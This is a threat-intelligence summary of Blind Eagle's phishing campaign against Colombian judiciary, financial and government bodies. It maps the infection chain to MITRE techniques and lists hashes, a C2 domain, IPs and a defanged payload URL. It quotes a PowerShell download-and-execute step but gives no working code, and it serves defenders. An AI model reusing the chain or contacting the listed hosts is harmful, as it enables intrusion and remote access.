Threat Research

Blind Eagle Deploys Fake UUE Files and Fsociety to Target Colombia’s Judiciary, Financial, Public, and Law Enforcement Entities

Securonix

Blind Eagle (APT-C-36) targeted Colombia and nearby Latin American entities with spear-phishing PDFs impersonating the DIAN tax authority to deploy a multi-stage infection chain, culminating in AsyncRAT payloads hosted via Discord. The campaign uses in-memory DLL loading, PowerShell/VBS-based execution, and DDNS/C2 infrastructure to achieve persistence and remote access.
#BlindEagle #AsyncRAT

Keypoints

  • APT-C-36 (Blind Eagle) has been active in Latin America, focusing on Colombia and Ecuador since at least 2019.
  • In a February campaign, the threat actor impersonated Colombia’s DIAN to target health, financial, law enforcement, and related government entities.
  • The initial access vector is spear-phishing with PDFs; the lure uses a real DIAN context but redirects to a malicious site via a masked link.
  • The weaponization stack includes PDFs, Visual Basic Scripts, .NET DLLs, and PowerShell, with payloads delivered from Discord and other web assets.
  • The payload chain culminates in the AsyncRAT family (via a Fsociety DLL in memory using Process Hollowing) to achieve remote access and persistence.

MITRE Techniques

  • [T1566.001] Phishing – The initial vector is a PDF attachment sent by email. Quote: “…The initial vector for infection is typically a PDF attachment sent by email.”
  • [T1204.002] User Execution – The VBS script is executed when the user double-clicks the file. Quote: “The VBS script is executed via wscript.exe once the user double-clicks the file.”
  • [T1059.001] PowerShell – The final payload is delivered via PowerShell downloading and executing base64 content. Quote: “First, PowerShell downloads and executes the decoded base64 content of hxxp://172.174.176[.]153/dll/Dll.ppam.”
  • [T1059.005] Visual Basic – Visual Basic Script tooling is used in the chain. Quote: “Visual Basic Scripts, .NET Assemblies injected in memory, Malicious DLLs, PowerShell”
  • [T1059.003] Windows Command Shell – Command-line actions appear in the chain (e.g., using cmd.exe and related commands). Quote: “The final payload executed is powershell.exe, with the following command line parameters:”
  • [T1053.005] Scheduled Task – AsyncRAT is scheduled via schtasks.exe when admin privileges are present. Quote: “If the user who executed it was an admin, then AsyncRAT can create a scheduled task using the process schtasks.exe”
  • [T1547.001] Run Keys / Startup Folder – Registry Run key used to persist the binary start. Quote: “If the user is not an admin, then AsyncRAT can create a registry key to execute the binary every time the system is started.”
  • [T1055.012] Process Hollowing – Fsociety.dll loads AsyncRAT in memory using the Process Hollowing technique. Quote: “Fsociety DLL loads AsyncRAT in memory, passing two parameters: … and AsyncRAT payload. Fsociety DLL loads AsyncRAT in memory using the Process Hollowing technique.”

Indicators of Compromise

  • [Hash] e4d2799f3001a531d15939b1898399b4, fc85d3da6401b0764a2e8a5f55334a7d683ec20fb8210213feb6148f02a30554 – Hashes for the first malicious PDF lure
  • [Hash] B432202CF7F00B4A4CBE377C284F3F28, 6D9D0EB5E8E69FFE9914C63676D293DA1B7D3B7B9F3D2C8035ABE0A3DE8B9FCA – Hashes for the later .uue package and embedded components
  • [File name] Fv3608799004720042L900483000P19878099700001537012.pdf, Asuntos_DIAN_N6440005403992837L2088970004-01-02-2023-pdf.uue – Lure file names observed in the campaign
  • [Domain] asy1543.duckdns.org:1543 – C2 domain used for AsyncRAT communications
  • [IP] 46.246.86.3, 46.246.12.6 – DuckDNS/DNS-resolved IPs used in infrastructure
  • [URL] hxxp://172.174.176[.]153/dll/Dll.ppam – Remote payload download URL in the PowerShell stage
  • [URL] hxxp://172.174.176[.]153/ – Web application hosting payloads used during the infection

Read more: https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia